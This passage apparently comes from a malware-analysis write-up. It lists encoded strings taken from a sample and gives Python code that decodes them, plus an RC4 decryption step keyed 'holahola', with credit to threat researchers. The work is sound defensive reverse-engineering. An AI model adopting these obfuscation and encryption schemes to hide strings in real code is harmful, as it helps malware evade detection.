FQCRCPKRDQCQKQGPKMBPKRGQKRBPKJHNKREQIPHQARBOAQANEPKPHQKRDMBPKRGQKRBPKJHNJPGRIQDQIREQINJRFQHPIPKRCNKQBNDQAPGRARCMCQKRERBJIOARCQJPJPKRDRCNEPKPHQKRDMBRARDRCJHNDPJQEODQDPGRCPKPKNDPHQIPKQGQAOEPHPHQHPKMCQKRERBJIOARCQJPJPKRDRCOERDPHRBREPKRCNDQAQGRAPKRCMBRARDRCJHNDPJQEMKMKMHRERDRCQDPIREREPKNIQDRDRDMCQKRERBJINHQKPGPKPKRCNHQKPIQGMBPKRGQKRBPKJHOAODNJPGQFQJRCOGQARBRDQDQKQIMCPJRHQJRCPJJINKOENIQEQIQKRBOHPKRCRCQEQJQJMBPKRGQKRBPKJHOAODMJREQEQGPKNJRFQHPIPKRCMBPKRGQKRBPK
JHOAODOBQGPHRDQBQJRCQHNFPJMCPJRHQJRCPJJINEQIPGQCPKOEREPIODRJRCREPKQIMBPKRGQKRBPKJHNFQHPHQBQAODRFPHOERIRDRDQAQHNJPGQFQJRCOGQARBRDQDQKQIMCPJRHQJRCPJJINEQIPGQCPKOEREPIODRJRCREPKQINIQEQIQKRBOHPKRCRCQEQJQJMBPKRGQKRBPKJHNDPJQENDPHQIPKQGQAMIRFQAQBPKRCPALFLFPDMBPKRGQKRBPKJHOBQJRDRDOBRBQKPIQARCRDNEQJQDREOCQKREREQDQJPKMCPJRHQJRCPJJIOEQHRCNBRHRAPGQJRCQEQJQJMIQERDQIPGRAMBPIRIREPKJIOEQHRCNBRHRAPGQJRCQEQJQJMIQERDQIPGRAMIQERDRDPALDLDLKPCMCPJRHQJRCPJJIODQARCRDQDQKQINFPJ', 'SHRJMJBJGJFHJJBJSJFHIJEJDJSJEJTJS', 'WHHIJIBILHVGXIKIGHTHUILIKGVHUIFIGIKIQ', 'ZHJHCHQHLHDHJFHFFFCHBHKHJ', 'XHMHYIAHV', 'YGSHIHWHQHNHRHFHXHJGNHWHSHHHIHXHW', 'UIOIGIUIJISIK', 'VIDIVIOIQID', 'TJGJLIRJDJEGEIRJDJE','XGEHNHOICHPIDIEGRHQGHHYIEIDIJGTHYHTHXIF','[GHHAHSGYGDGZFYGYGVGXGZHJHL', 'ZGCHKG[HEHDFVG[HQHD', 'NKMMDNGLOKIMAKCMHLLMBMA']
def decryptString(encString):
    # The first character carries the per-string key; the rest is consumed in
    # pairs, each pair (both offset from 'A') yielding one plaintext character.
    decString = ''
    key = ord(encString[0])
    itr = 1
    for x in range(1, len(encString) - 1, 2):
        val1 = ord(encString[x]) - 65
        val2 = ord(encString[x + 1]) - 65
        # Combine the pair with the key, then subtract 1 on every odd position
        decString += chr((val1 * (key - 63) + val2 - key) - (itr % 2))
        itr += 1
    print(f'{decString}\n')
    return decString

for string in strings:
    decryptString(string)
from arc4 import ARC4

# Hex-encoded RC4 blob extracted from the executable (value not reproduced here)
data = ''
cipher = ARC4(b'holahola')
plainCode = cipher.decrypt(bytes.fromhex(data))
print(plainCode)
Thank you to Igal Lytzki, Perception Point Threat Analyst & IR Team Lead, @Merlax, and others for their research on the subject.